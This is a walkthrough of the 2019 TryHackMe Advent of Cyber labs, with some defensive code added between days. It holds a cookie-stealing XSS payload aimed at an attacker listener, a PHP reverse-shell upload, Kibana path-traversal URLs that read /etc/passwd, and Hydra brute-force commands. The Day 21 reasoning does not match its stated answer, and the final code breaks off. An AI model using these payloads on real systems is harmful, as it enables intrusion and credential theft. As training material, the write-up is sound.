Advent of Cyber 1 [2019]
This guide contains the answers, and the steps needed to reach them, for the Advent of Cyber room.
Table of contents
- [Day 1] Inventory Management
- [Day 2] Arctic Forum
- [Day 3] Evil Elf
- [Day 4] Training
- [Day 5] Ho-Ho-Hosint
- [Day 6] Data Elf-iltration
- [Day 7] Skilling Up
- [Day 8] SUID Shenanigans
- [Day 9] Requests
- [Day 10] Metasploit-a-ho-ho-ho
- [Day 11] Elf Applications
- [Day 12] Elfcryption
- [Day 13] Accumulate
- [Day 14] Unknown Storage
- [Day 15] LFI
- [Day 16] File Confusion
- [Day 17] Hydra-ha-ha-haa
- [Day 18] ELF JS
- [Day 19] Commands
- [Day 20] Cronjob Privilege Escalation
- [Day 21] Reverse Elf-ineering
- [Day 22] If Santa, Then Christmas
- [Day 23] LapLANd (SQL Injection)
- [Day 24] Elf Stalk
[Day 1] Inventory Management
In this task we need to use cookies to access another user's account.
- What is the name of the cookie used for authentication?
First we need to create an account on the website to view the cookie we get.
Now we login and open the developer tools to look at the cookie stored in our browser. Here we find its name.
Click for answer
authid
- If you decode the cookie, what is the value of the fixed part of the cookie?
We can decode the cookie using CyberChef. It looks like a Base64 encoding, and this is exactly what CyberChef suggests.
We see the cookie is our username followed by a random-looking string of characters. Could this be a fixed part shared by all cookies?
Click for answer
v4er9ll1!ss
- After accessing his account, what did the user mcinventory request?
Let's find out. Adding the username mcinventory in front of the fixed part of the cookie and encoding it through CyberChef, we get the following cookie:
Change the value of our existing cookie to the value we just created and reload the page. Looks like we are now logged in as mcinventory. On the home page we can see what he requested.
Click for answer
firewall
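As an added illustration (not code from the room or this write-up) of why this cookie is forgeable and what a server-side fix looks like: the room's Base64(username + fixed part) scheme next to an HMAC-signed variant whose verifier rejects a cookie with a swapped username. FIXED_PART is the constant recovered above; SERVER_KEY and the function names are made up for the example.

```python
import base64
import hashlib
import hmac
from typing import Optional

# Added example, not code from the room. FIXED_PART is the constant the
# write-up recovers from the authid cookie; SERVER_KEY is a made-up key.
FIXED_PART = "v4er9ll1!ss"
SERVER_KEY = b"example-only-server-key-not-from-the-room"


def weak_cookie(username: str) -> str:
    """The room's scheme: Base64 of username followed by a constant suffix."""
    return base64.b64encode((username + FIXED_PART).encode()).decode()


def weak_cookie_user(cookie: str) -> str:
    """Recover the username from a weak cookie.

    The only 'secret' is FIXED_PART, and every user learns it by decoding
    their own cookie, so the suffix proves nothing about who minted it.
    """
    decoded = base64.b64decode(cookie).decode()
    if not decoded.endswith(FIXED_PART):
        raise ValueError("not a valid authid cookie")
    return decoded[: -len(FIXED_PART)]


def signed_cookie(username: str) -> str:
    """Hardened variant: username plus an HMAC-SHA256 tag under a server-side key."""
    tag = hmac.new(SERVER_KEY, username.encode(), hashlib.sha256).hexdigest()
    return base64.b64encode(f"{username}.{tag}".encode()).decode()


def signed_cookie_user(cookie: str) -> Optional[str]:
    """Return the username only if the tag verifies, otherwise None."""
    try:
        username, _, tag = base64.b64decode(cookie).decode().rpartition(".")
    except (ValueError, UnicodeDecodeError):
        return None
    expected = hmac.new(SERVER_KEY, username.encode(), hashlib.sha256).hexdigest()
    # constant-time comparison so the tag cannot be guessed byte by byte
    return username if hmac.compare_digest(tag, expected) else None


def swap_username(cookie: str, new_user: str) -> str:
    """Rewrite the username in a signed cookie but keep the old tag (tampering)."""
    _, _, tag = base64.b64decode(cookie).decode().rpartition(".")
    return base64.b64encode(f"{new_user}.{tag}".encode()).decode()


if __name__ == "__main__":
    # Anyone who knows FIXED_PART can mint a cookie for any account
    print(weak_cookie_user(weak_cookie("mcinventory")))
    # The same trick against the signed cookie fails verification (prints None)
    print(signed_cookie_user(swap_username(signed_cookie("alice"), "mcinventory")))
```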
[Day 2] Arctic Forum
In this task we will be using brute forcing to find hidden webpages.
- What is the path of the hidden page?
We will use DirSearch to find any hidden directories on the server. Using the following command:
Click for answer
/sysadmin
- What is the password you found?
Doing a little bit of OSINT research, we can look at the source of the website. Looks like there is a reference to a developer's GitHub page. Searching for Arctic Digital Design we find the following GitHub page with some default credentials.
Click for answer
defaultpass
- What do you have to take to the 'partay'
Using the default credentials we found, we can login to the sysadmin page. On this page we find what to bring to the party.
Click for answer
Eggnog
[Day 3] Evil Elf
In this task we will investigate a network capture using Wireshark. The supporting documentation can be found here.
- Whats the destination IP on packet number 998?
Looking at entry 998, we can see its destination IP in the destination column.
Click for answer
63.32.89.195
- What item is on the Christmas list?
After opening the capture file in Wireshark, we can filter on either http or telnet to find any plain-text data. Sure enough, we get three hits for telnet. In the first one, we see a command which writes an item to the Christmas list.
Click for answer
ps4
- Crack buddy's password!
In the next entries we see a command to look up the users in the shadow file. Here we see a hashed password for buddy.
Using hashcat we can crack this password with the following command:
Click for answer
rainbow
[Day 4] Training
In this task we will be learning some more basic commands to use in Linux.
- How many visible files are there in the home directory (excluding ./ and ../)?
To find the files in the home directory we use the following command: `ls`.
Click for answer
8
- What is the content of file5?
To view the contents of file5 we use the following command:
Click for answer
recipes
- Which file contains the string ‘password’?
To find which file contains a specific string, we can use the following command:
grep -l -e "password" *
-l -> Only show the names of matching files
-e -> Pattern to search for (here the literal string "password")
* -> The files to look through (every file in the current directory); note that -f would instead read the patterns from a file, so it does not belong here
Click for answer
file6
- What is the IP address in a file in the home folder?
To find the IP address in one of the files, we use the following command:
cat * | grep -E "([0-9]{1,3}\.){3}[0-9]{1,3}" -o
-E -> Extended Regex pattern to use
-o -> Only show the matching string
Click for answer
10.0.0.05
- How many users can log into the machine?
We can look for any user folders in the home directory.
ls -la /home
-l -> Display in a long listing format
-a -> Also show (hidden) files starting with `.`
Click for answer
3
- What is the sha1 hash of file8?
To find the hash we can use sha1sum with the following command: `sha1sum file8`.
Click for answer
fa67ee594358d83becdd2cb6c466b25320fd2835
- What is mcsysadmin’s password hash?
This is something we can usually find in the shadow file. Unfortunately, we don't have permission to access it. Maybe there is a backup file lying around somewhere. Let's look for it using:
The `2>/dev/null` part sends error messages (such as 'Permission denied') to /dev/null, so we only see the entries that actually match our search.
Click for answer
$6$jbosYsU/$qOYToX/hnKGjT0EscuUIiIqF8GHgokHdy/Rg/DaB.RgkrbeBXPdzpHdMLI6cQJLdFlS4gkBMzilDBYcQvu2ro/
[Day 5] Ho-Ho-Hosint
In this task we will be using OSINT to find more information about our target. The first thing to do, is to reveal any metadata in the provided image.
Looks like the photographer is JLolax1. After searching for her, we find her Twitter profile. Here we can easily find the answers to questions 1, 2, and 3.
- What is Lola's date of birth? Format: Month Date, Year(e.g November 12, 2019)
Click for answer
December 29, 1900
- What is Lola's current occupation?
Click for answer
Santa's Helper
- What phone does Lola make?
Click for answer
iPhone X
- What date did Lola first start her photography? Format: dd/mm/yyyy
Here we need to dig a little deeper. Following the link in her bio, we get to her WordPress website. Nothing is stated about when she started photography. But we can search for some interesting information through the Wayback Machine. Here we can see this note on a previous version.
Click for answer
23/10/2014
- What famous woman does Lola have on her web page?
To find out who is on the image, we can run it through Google image search or TinEye.
Click for answer
ada lovelace
[Day 6] Data Elf-iltration
In this task we are looking at a network capture to identify any information we need.
- What data was exfiltrated via DNS?
Filtering the data on DNS traffic, we find multiple entries with the same seemingly random string. Let's decode it using CyberChef.
Click for answer
Candy Cane Serial Number 8491
- What did Little Timmy want to be for Christmas?
Looking further into the telnet and http traffic we find a zip archive and an image. We can save these objects to our computer.
To crack the archive, we can use fcrackzip.
fcrackzip -b -D -p /usr/share/wordlists/rockyou.txt christmaslists.zip
-b -> specify bruteforce attack
-D -> specify using a dictionary
-p -> specify dictionary file to use
Now unzip the archive and view Timmy's lists.
Click for answer
PenTester
- What was hidden within the file?
To find any hidden data in the image, we can use steghide.
steghide extract -sf ~/Downloads/TryHackMe.jpg
extract -> specifies extracting hidden data
-sf -> specifies file to extract from
Click for answer
RFC527
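Added example (not from the room or this write-up): a small detector for the kind of DNS exfiltration seen in the first question. It walks a list of constructed query names, treats leading all-hex labels as an encoded payload, decodes them and counts how often each payload repeats. The page does not say which encoding CyberChef decoded, so hex is an assumption here, and the sample names and domain are constructed.

```python
import re
from typing import Dict, List, Optional

# Constructed DNS query names standing in for the capture's DNS traffic.
# The payload labels are the hex encoding of the string the room's data decoded to.
SAMPLE_QUERIES = [
    "www.tryhackme.com",
    "43616e64792043616e652053657269616c204e756d6265722038343931.holidaythief.com",
    "deadbeef.cdn.example.net",
    "43616e64792043616e652053657269616c204e756d6265722038343931.holidaythief.com",
    "time.google.com",
]

HEX_LABEL = re.compile(r"^[0-9a-fA-F]+$")
MIN_HEX_CHARS = 16  # shorter hex labels (cache-busting ids and the like) are ignored


def decode_hex_labels(qname: str) -> Optional[str]:
    """Return the decoded payload if the leading labels of qname are hex text, else None.

    Exfiltration tools usually put the data in the leftmost labels and keep a
    fixed domain on the right, so we collect labels until the first non-hex one.
    """
    hex_labels = []
    for label in qname.rstrip(".").split("."):
        if HEX_LABEL.match(label) and len(label) % 2 == 0:
            hex_labels.append(label)
        else:
            break
    blob = "".join(hex_labels)
    if len(blob) < MIN_HEX_CHARS:
        return None
    try:
        text = bytes.fromhex(blob).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None  # hex but not ASCII text: still worth a look, not decoded here
    return text if text.isprintable() else None


def find_exfiltration(qnames: List[str]) -> Dict[str, int]:
    """Group suspicious queries by decoded payload, with a hit count per payload."""
    hits: Dict[str, int] = {}
    for qname in qnames:
        payload = decode_hex_labels(qname)
        if payload is not None:
            hits[payload] = hits.get(payload, 0) + 1
    return hits


if __name__ == "__main__":
    for payload, count in find_exfiltration(SAMPLE_QUERIES).items():
        print(f"{count}x  {payload}")
```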
[Day 7] Skilling Up
In this task we will be using nmap to perform several scans of the target machine. The first 3 questions can be answered with one command:
nmap -sT -sV -p1-1000 -O 10.10.74.77
-sT -> Perform a TCP scan
-sV -> Look for more info on the services
-p -> Specify port numbers to search for
-O -> Find more info on the host OS
But they can also be performed individually.
- How many TCP ports under 1000 are open?
Click for answer
3
- What is the name of the OS of the host?
Click for answer
Linux
- What version of SSH is running?
Click for answer
7.4
- What is the name of the file that is accessible on the server you found running?
During the Nmap scan we found a webserver running on port 999. Visiting this server in the browser, we find the file.
Click for answer
interesting.file
[Day 8] SUID Shenanigans
In this task we must ssh into the target machine and use SUID exploitation to read the flags we don't have permission for.
Username: holly
Password: tuD@4vt0G*TU
- What port is SSH running on?
Running `nmap -sV 10.10.75.216` didn't give us a result, so we have to increase our port search range with:
Click for answer
65534
- Find and run a file as igor. Read the file /home/igor/flag1.txt
First we need to find which binaries run as igor. We can do this with the following command:
We see we can run the find command to view the flag: `find /home/igor/flag1.txt -exec cat {} \;`.
Click for answer
THM{d3f0708bdd9accda7f937d013eaf2cd8}
- Find another binary file that has the SUID bit set. Using this file, can you become the root user and read the /root/flag2.txt file?
Running the command again but searching for root we find the following:
The system-control binary could be what we are looking for. To read the flag we can take one of two approaches.
We either read the flag directly through system-control.
Or we can use su to switch to root and read the flag.
Click for answer
THM{8c8211826239d849fa8d6df03749c3a2}
[Day 9] Requests
Machine IP:
10.10.169.100
- What is the value of the flag?
I had issues connecting to the machine (yes, my VPN was turned on). There was no response using the script or through the browser. Doing a quick nmap scan did reveal the machine to exist with port 3000. However, it was listed as filtered. This probably means the machine or service is not active anymore. It is a room from 2019 so...
Anyway, by using the supplied documentation I came up with the following script which would have hopefully found the flag.
import requests

host = 'http://10.10.169.100:3000'
path = ''
values = ''

# Each response holds a piece of the flag in "value" and the name of the
# next endpoint in "next"; follow the chain until the API answers "end".
while path != '/end':
    response = requests.get(host + path)
    json_response = response.json()
    values += json_response['value']
    path = '/' + json_response['next']

print('The flag is ' + values)
Since this room is now probably not usable anymore, I think it wouldn't be a problem to post the flag itself to allow others to finish this room.
Click for answer
sCrIPtKiDd
[Day 10] Metasploit-a-ho-ho-ho
In this task we need to find an exploit for the webserver and gain access using Metasploit. We can use this blog post to guide us.
Machine IP:
10.10.154.103
First we run an nmap scan to find out more about our target machine.
We can see there is an Apache Coyote 1.1 service running on port 80 which is of interest to us. From the documentation we find we will be exploiting the struts2 vulnerability.
So open up Metasploit with the `msfconsole` command and type `search struts2` to find any modules we can use.
For this task we will be using the `exploit/multi/http/struts2_content_type_ognl` module. Type `use` and the module name to select it.
Next we will fill out the required information for our payload. Type `show options` to list all the options.
In our example we will set the RHOST, RPORT, and TARGETURI. The LHOST was already set correctly. If not, use `ifconfig` to find your IP address under eth0 or tun0 (depending on whether or not you are using a VPN). After that is done, type `run` to run the exploit.
In our case the TARGETURI will be `/showcase.action` as this is the base address for the webserver.
Now we have our session running on the target machine.
- Compromise the web server using Metasploit. What is flag1?
To find the flag we will use the find command. However, we first need to change our meterpreter session to a regular shell by typing `shell` into our session.
Click for answer
THM{3ad96bb13ec963a5ca4cb99302b37e12}
- Now you've compromised the web server, get onto the main system. What is Santa's SSH password?
Going through some of the directories, we find a file called ssh-creds.txt. This looks interesting. Inside we find some credentials we can use to ssh into the machine.
Click for answer
rudolphrednosedreindeer
- Who is on line 148 of the naughty list?
In a terminal window (not meterpreter) we can ssh into the machine and look around for the files. We spot two lists here.
To see who is on line 148 of the naughty list we could just count the lines, but using cat with some extra options will be easier.
The `-n` argument shows line numbers in the output, which we can use to search with grep.
Produces
Click for answer
Melisa Vanhoose
- Who is on line 52 of the nice list?
The same command can be used here.
Produces
Click for answer
Lindsey Gaffney
[Day 11] Elf Applications
In this task we need to access some services on the target machine. See the accompanying documentation for more help. Machine IP: 10.10.223.45
We first run an nmap scan to find all available services on the target machine by running:
Here we can see we have three services running on their default ports. FTP on port 21, NFS on port 111, and MySQL on port 3306.
- What is the password inside the creds.txt file?
To get the password we need to access the NFS service. First we need to find out which shares are available for us to mount.
Now we can mount this share to our system.
Now we can go to the newly mounted directory and read the contents of the file.
The file can also be opened from the folder itself.
Click for answer
securepassword123
- What is the name of the file running on port 21?
The FTP service is active on port 21, so we will see if we can login anonymously.
Success! Now let's search for the file and copy it to our machine with the get command.
Click for answer
file.txt
- What is the password after enumerating the database?
Reading the file.txt file we found on the FTP server, we see it contains some credentials for a SQL service. Let's see if they still work.
Now we need to see which database we need by running the `show databases` command.
After trying several databases we find another one that might be interesting. Let's switch to that one.
Does it contain any interesting tables? It looks like it! Let's enumerate the contents of the table.
Click for answer
bestpassword
[Day 12] Elfcryption
In this task we will look at various encryption techniques to decrypt some files we received. The supporting documentation can be found here.
We first unzip the contents of the file using either the `unzip tosend.zip` command or through the GUI.
- What is the md5 hashsum of the encrypted note1 file?
To read the md5 hash of the note1.txt.gpg file we use the following command:
Click for answer
24cf615e2a4f42718f2ff36b35614f8f
- Where was elf Bob told to meet Alice?
To decrypt the file we need a passphrase. I didn't know what it was so I used the one provided by the hint: 25daysofchristmas. Now we can decrypt it by typing `gpg -d note1.txt.gpg` and entering the passphrase when prompted.
Click for answer
santa's grotto
- Decrypt note2 and obtain the flag!
To decrypt the message we use the command as specified in the supporting material. Again, we use the passphrase supplied by the hint: hello.
Click for answer
THM{ed9ccb6802c5d0f905ea747a310bba23}
[Day 13] Accumulate
In this task we are asked to use our previously gathered knowledge to gain access to a system with only its IP address.
The first thing we do, is run a network scan to find all open ports and their services.
Here we see a server running on port 80. Remember the other service for later.
- A web server is running on the target. What is the hidden directory which the website lives on?
Let's open the browser and navigate to the machine's IP on port 80. Here we indeed find a page for Windows Server. None of the links on this page will lead us anywhere, as there is no internet connection. Instead we will use a tool we used on day 2 of this challenge, dirsearch. With the following command we can enumerate the different directories present on the server.
This quickly gives us a directory to use. When navigating to it, we see the website is indeed available!
Click for answer
/retro
- Gain initial access and read the contents of user.txt
We need to find a way into the system and read its contents. First we start looking around for any interesting information on the blog. None of the posts have anything of interest. However, we can also see a comment posted by Wade, the author. This seems to hold some private stuff you would not want out in the open. Could it possibly be a password?
After some searching we find a login page for the WordPress website. We can indeed log in using the password we found earlier and the username Wade. However, this will again lead us nowhere, as we cannot access the files from here. Remember the other service we found running on port 3389? A quick Google search tells us this is used for RDP connections, how fortunate!
Using Remmina with `remmina -c rdp:wade@10.10.85.141:80` to log in to the machine, we need to supply the password at the prompt.
Here we find a conveniently placed file on our desktop. Sweet!
Click for answer
THM{HACK_PLAYER_ONE}
- [Optional] Elevate privileges and read the content of root.txt
This question was a tough one, as there was no possibility for me to find out where to go next without a guide. The hint mentioned we should look for what the user was searching for. So the first thing I did was open Internet Explorer to find any browser history. This was empty... Looking at other people's writeups, I saw they also had Chrome installed. I, unfortunately, didn't.
I took the liberty of viewing the user's browser history another user posted. Apparently, they were searching for a CVE. Perhaps the system is vulnerable to it.
After another Google search I learned we could exploit the vulnerability to obtain a cmd shell with elevated privileges through the UAC window.
In this case we can open the .exe file on the desktop to open a UAC prompt and view the certificate.
Clicking on the link for the certificate issuer should spawn a browser instance with elevated privileges, as it originates from the .exe.
Important note! Make sure no browser window is currently open before visiting the link. Otherwise, the link will be opened in the browser instance without elevated privileges.
In the opened browser window we get a connection error, but we can ignore that. We need to save this page, either through the menu or with Ctrl + S.
In the path bar we write: C:\Windows\System32\cmd.exe and press Enter.
A cmd shell should open with elevated privileges. Let's check.
Let's find out which admin user we should log in to.
Looks like it is called Administrator.
Moving into this directory we can search for the text file using:
Now we can open this file and read the flag!
Click for answer
THM{COIN_OPERATED_EXPLOITATION}
[Day 14] Unknown Storage
In this task we will need to look for leaked information from an improperly configured AWS bucket. The supporting material can be found here.
- What is the name of the file you found?
All we need here is the name of the bucket: advent-bucket-one.
We can navigate to advent-bucket-one.s3.amazonaws.com to see if the bucket is publicly accessible and, if so, which file is available.
Click for answer
employee_names.txt
- What is in the file?
To view a certain file, we can either use the AWS CLI (account necessary) or the browser. In this case it is easier to use the browser.
advent-bucket-one.s3.amazonaws.com/employee_names.txt
Click for answer
mcchef
[Day 15] LFI
In this task, we will use Local File Inclusion in order to find a password to a server. Use the supporting information found here.
Machine IP: 10.10.253.159
- What is Charlie going to book a holiday to?
When we open the IP address in our browser we can see the notes Charlie has been taking.
Click for answer
Hawaii
- Read /etc/shadow and crack Charlies password.
Looking at the source code of the website, we notice this piece of code.
Looks like it is loading content from other files. It uses the /get-file/ command followed by the path of the file. Let's try reading the /etc/shadow file for some passwords.
Note. This can also be done using Burpsuite's Intercept function.
Here we find a password for the user Charlie. Looks like it is a hashed password. From Hashcat's examples page, this looks like a SHA512 hash (hashcat mode 1800).
Copy and save the hash to a file to be used with Hashcat.
Note! Make sure you copy the entire (and correct) part of the hash: everything between the ':' and ':' delimiters. Otherwise the length might not be what is expected by Hashcat.
Using hashcat with the following command, we can try to find out what the password was (hashcat didn't work on a VM, so I had to switch to Windows).
Click for answer
password1
- What is flag1.txt?
From our previously done Nmap scan, we see port 22 is open for an SSH connection. Lets try our credentials here.
Now we just need to find and read the flag.
Click for answer
THM{4ea2adf842713ad3ce0c1f05ef12256d}
[Day 16] File Confusion
In this task we are using Python to automate several tasks on some zipped files. The supporting documentation can be found here.
- How many files did you extract (excluding all the .zip files)?
The following code was used to unzip all files.
import os
import zipfile

# Extract every .zip archive in /Files/ into that same directory
for m in os.listdir("/Files/"):
    if m.endswith(".zip"):
        with zipfile.ZipFile("/Files/" + m, "r") as zip_files:
            zip_files.extractall("/Files/")
Click for answer
50
- How many files contain Version: 1.1 in their metadata?
I could not get the exiftool installed properly and it would not import in my script.
Click for answer
3
- Which file contains the password?
T.b.d.
Click for answer
dL6w.txt
[Day 17] Hydra-ha-ha-haa
In this task we will be using Hydra (can be downloaded here if needed) to brute force a password for someones web application login and SSH login. The supporting material can be found here.
With a quick Nmap scan we can see there are indeed two open ports (22 and 80).
- Use Hydra to bruteforce molly's web password. What is flag 1? (The flag is mistyped, its THM, not TMH)
We first visit the website on the target ip and port 80 (without the port it will still redirect).
After inspecting the page, we see the form uses the POST method and the fields of interest are called username and password.
Using the documentation we can write the following hydra command to try and crack Molly's password.
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.52.128 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"
- -l = username
- -P = password list
- /login = the page to which hydra directs the request
- username & password = the fields to enter data into
With the found password we can now log in to the website and find the flag.
Click for answer
THM{2673a7dd116de68e85c48ec0b1f2612e}
- Use Hydra to bruteforce molly's SSH password. What is flag 2?
To crack molly's ssh password we use the following command with Hydra:
- -t = number of threads
Using this password we can login to the machine through ssh with:
Here we can find the flag.
Click for answer
THM{c8eeb0468febbadea859baeb33b2541b}
[Day 18] ELF JS
In this task we will exploit an XSS vulnerability using JavaScript to get access to the admin cookie. The supporting documentation can be found here.
- What is the admin's authid cookie value?
After registering ourselves on the website, it is time to find out where we can use this XSS vulnerability.
Using the code `<script>alert(1)</script>` in the form for the message, we observe this is where the vulnerability is.
This also works for displaying our cookie for this session using: <script>alert(document.cookie);</script>
Using the documentation we see that we can redirect the user to a website controlled by us which contains the cookie data within the request: `<script>window.location = 'attacker-web-site.com/page?param=' + document.cookie</script>`
It also stated we should close any paragraphs. From the developer tools we can indeed see the information of the messages is placed within <p> tags, so we need to close those as well.
Altering the code line we get the following:
</p><script>window.location = "http://10.18.78.136:1337/mine.html?cookie="+ document.cookie;</script><p>
The IP address is our machine and the port is a 'randomly' chosen number. Then we need a fake page and parameter.
Now we set up a listener on our machine using netcat to listen for any request made on port 1337.
- -l = specifies using listening mode
- -v = verbose logging
- -p = specifies port number to listen on
Note! This apparently works, as the admin will periodically visit the website, meaning their connection will be forwarded to our machine. This was unclear to me at first.
Note! The code we used here, window.location, actually redirects the user to our address. This effectively renders the website useless as it is constantly redirecting traffic. This means we have to input our code correctly in one try. Otherwise we have to restart the VM. It is clear this is not the perfect command as it will alert the owners; however, for now this was the best I could find by myself.
Click for answer
2564799a4e6689972f6d9e1c7b406f87065cbf65
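Added example, not code from the room: the vulnerable rendering beside an output-encoded version, run on the exact payload above, plus a check of the Set-Cookie flags that would have kept authid out of document.cookie. The function names and the sample header values are constructed for illustration.

```python
import html
from typing import List

# The payload from the write-up, used here only as test input.
PAYLOAD = ('</p><script>window.location = "http://10.18.78.136:1337/mine.html?cookie="'
           '+ document.cookie;</script><p>')


def render_message_unsafe(message: str) -> str:
    """What the vulnerable page does: the message lands inside a <p> untouched."""
    return f"<p>{message}</p>"


def render_message_safe(message: str) -> str:
    """Hardened rendering: HTML-encode the message before it reaches the <p>.

    '<' becomes '&lt;' so the stored text can neither close the paragraph
    nor open a <script> element; the browser shows it as literal text.
    """
    return f"<p>{html.escape(message, quote=True)}</p>"


def has_script_element(rendered: str) -> bool:
    """Rough check used below: does the markup contain a real <script> tag?"""
    return "<script" in rendered.lower()


def missing_cookie_flags(set_cookie_header: str) -> List[str]:
    """Audit a Set-Cookie header for the flags that would have blunted this attack.

    HttpOnly keeps the value out of document.cookie, so an injected script
    cannot read it; Secure and SameSite limit where the browser sends it.
    """
    attrs = {part.strip().split("=")[0].lower()
             for part in set_cookie_header.split(";")[1:]}
    return [flag for flag in ("HttpOnly", "Secure", "SameSite")
            if flag.lower() not in attrs]


if __name__ == "__main__":
    print(render_message_unsafe(PAYLOAD))
    print(render_message_safe(PAYLOAD))
    print(missing_cookie_flags("authid=abc; Path=/"))
```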
[Day 19] Commands
In this task we will explore the possibilities of using system commands through a web application. The supporting material can be found here.
- What are the contents of the user.txt file?
When accessing the website on the IP address at port 3000 we only see some text.
We are told something interesting was found on the api/cmd/ endpoint. Navigating there we find the following:
Even though this doesn't give us anything, we can see from a quick dirsearch that it does indeed exist. In fact, we see various names that look like commands which we might be able to use.
After testing a few, this does indeed look to be the case.
Let's try a command to find our text file, since we know what it is called. We use `find -name user.txt` to get the following:
Now we know where we can find it, we will try reading the file using cat. However, this time `cat /home/bestadmin/user.txt` didn't work.
So we need to encode the URL ('/' and 'space'). We can do so using CyberChef.
Now we can read the file with the encoded URL.
Click for answer
5W7WkjxBWwhe3RNsWJ3Q
[Day 20] Cronjob Privilege Escalation
In this task we are tasked to hack into Sam's account and elevate our privileges using a running cronjob. There is no supporting material for this task, but I used this to help me understand how to exploit cronjobs to elevate our privileges.
- What port is SSH running on?
The first thing to do is an nmap scan to find any open ports and running services to determine on which port ssh is running.
Click for answer
4567
- Crack sam's password and read flag1.txt
If Sam uses an easy password, logging into their account shouldn't be too difficult with Hydra. We can use the following command to have Hydra crack Sam's password.
Now we can ssh into the machine and find the flag.
Click for answer
THM{dec4389bc09669650f3479334532aeab}
- Escalate your privileges by taking advantage of a cronjob running every minute. What is flag2?
Now we need to find out what cronjob is running and what it is executing. For this we can use `crontab -l`. Unfortunately, nothing is listed here. Neither does `cat /etc/crontab` show anything. Let's try `find /home -name "*sh"` to find any scripts.
Looks like a recurring task script to me. From the supplied website we found how to add a user to the list of sudoers. Add this to the script.
Now we just have to wait a minute before we can continue. We can do a quick check to see if it is working with `sudo -i` or `sudo -l`.
To read the file we just need the following command: `sudo cat /home/ubuntu/flag2.txt`.
Click for answer
THM{b27d33705f97ba2e1f444ec2da5f5f61}
[Day 21] Reverse Elf-ineering
In this task we will take a look at reverse engineering binaries. We will use Radare2 for this. The supporting documentation can be found here.
We will start by opening the file for debugging in Radare2 with the command `r2 -d challenge1`. Then we tell the program to analyze the file and search for an entry point named main with `aa` and `afl | grep main`.
Now we can look at the assembly code by typing `pdf @main`.
To answer the questions we can simply look through the code. But I will also do a check to see if we are correct by running the code and inspecting the registers and memory. This is done by placing a breakpoint before the `mov eax` line.
Use `pdf @main` again to check the placement of the breakpoint (displayed as `b`). And `dc` to run the program up until the breakpoint.
- What is the value of local_ch when its corresponding movl instruction is called(first if multiple)?
On the third line we see that 1 is placed into the variable var_ch.
To check, we simply type `px @rbp-0xc` to view the variable.
Click for answer
1
- What is the value of eax when the imull instruction is called?
On the fourth line the value 8 is placed in var_8h. On line five, eax is set to 1. At the imull instruction, eax is multiplied by var_8h.
To check we type `dr` to view the registers (rax=eax).
Click for answer
6
- What is the value of local_4h before eax is set to 0?
On the next line var_4h is set to eax.
To check, we type `px @rbp-0x4`.
Click for answer
6
[Day 22] If Santa, Then Christmas
In this task we have a similar challenge only with an added if-statement in the code. The supporting documentation can be found here.
Like the previous task, we will open the file for debugging, analyze it, and search for a main entry point.
Next we can look at the code with `pdf @main`.
- what is the value of local_8h before the end of the main function?
First, var_8h is set to 8 and var_4h is set to 2. Then eax is set to var_8h.
Then if eax (8) is less than or equal to var_4h (2): jump to [..]. As this statement is false, it moves on to add 1 to var_8h. Then it jumps to the end.
To check we set a breakpoint before the final instruction: `db 0x00400b71`. And check its value with `px @rbp-0x8`.
Click for answer
9
- what is the value of local_4h before the end of the main function?
From the first question we see var_4h is set to 2 and is never changed before the end.
To check this we type `px @rbp-0x4`.
Click for answer
2
[Day 23] LapLANd (SQL Injection)
In this task we are using SQL injection to enumerate databases without logging in. Then we use our found credentials to find more information on the subject. The supporting documentation can be found here.
- Which field is SQL injectable? Use the input name used in the HTML code.
On the login page we can see two fields: email and password. It could be either one of these. Through sqlmap we found it to be the email field. Remember to use the name as used in the HTML file.
Click for answer
log_email
- What is Santa Claus' email address?
To get the email address, we will enumerate the databases and find any tables which contain user information. To start I run the following command to exploit the vulnerability and enumerate all the databases.
Note! This can also be done with the wizard: `sqlmap --wizard`. I used that the first time. But you have more granular control over the output doing it yourself.
The social database looks like a good place to start. Let's enumerate it with the following command:
In this database we see a table called users. Let's continue with that one.
The table is dumped to a file which we can open, or we can use the result printed in the terminal.
Click for answer
bigman@shefesh.com
- What is Santa Claus' plaintext password?
In the previous step we also found Santa's hashed password. We need to crack it with Hashcat. From their examples page, the hash looks like an MD5 hash. Using the following command we can find out what the plain-text password is.
Click for answer
saltnpepper
- Santa has a secret! Which station is he meeting Mrs Mistletoe in?
With these credentials we can login to the website. Looking around for any messages we find the following.
Click for answer
Waterloo
- Once you're logged in to LapLANd, there's a way you can gain a shell on the machine! Find a way to do so and read the file in /home/user/
Since this application is based on PHP, we can use the PHP reverse shell found in /usr/share/webshells/... . We substitute the IP address for ours and the port for any port number (10.18.78.136:1337). Save it and upload it to the website. We also need to open a listener on port 1337 using Netcat.
Looks like the .php extension is blocked. Let's change the file type and try again.
This seems to work and we can see an incoming connection.
Now all we need to do, is navigate to the flag and open it.
Click for answer
THM{SHELLS_IN_MY_EGGNOG}
[Day 24] Elf Stalk
In this task we only get some information about the target machine and that we need to find a way to uncover sensitive information.
- Find the password in the database
The first thing I did was an nmap scan to uncover any services running on the machine: `nmap -sV 10.10.77.2`.
Looks like we have an Elasticsearch service running on 9200 and a Kibana log on 8000. This might come in handy later. Let's focus on the database first.
From the documentation, we can see they use some sort of GET request, which we may be able to alter.
Using _search, we can see we indeed get a response.
Now that we have seen the structure of the data, we can try to look for a password in one of the messages.
Nice!
Click for answer
9Qs58Ol3AXkMWLxiEyUyyf
- Read the contents of the /root.txt file
Now let's focus on the Kibana instance. We didn't find anything yet, but a more in-depth nmap scan revealed a service running on port 5601.
This can be confirmed from the log file we found earlier.
The version looks to be 6.4.2. Searching for an exploit yielded this result on Github.
Apparently we can use a path traversal exploit to look at the data on the machine. This was confirmed after navigating to the site via Burp Suite. Let's try with a file that probably exists as a proof of concept.
http://10.10.77.2:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../.../../../../etc/passwd
The website seemed to be stuck. Maybe the log file can tell us something?
Here we can in fact see the contents of the passwd file. Let's try with the root.txt file.
http://10.10.77.2:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../.../../../../root.txt
Hidden between the rest of the lines, we can see the contents of the file!
Click for answer
someELKfun
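Added example (not the author's code): detection logic for the traversal requests above, run over constructed access-log lines modelled on the write-up's URLs (the log format, client address and timestamps are made up). It URL-decodes each query parameter twice, to catch double encoding, and flags values containing dot-dot-slash sequences, including the unusual .../ segment in the requests shown.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, unquote, urlsplit

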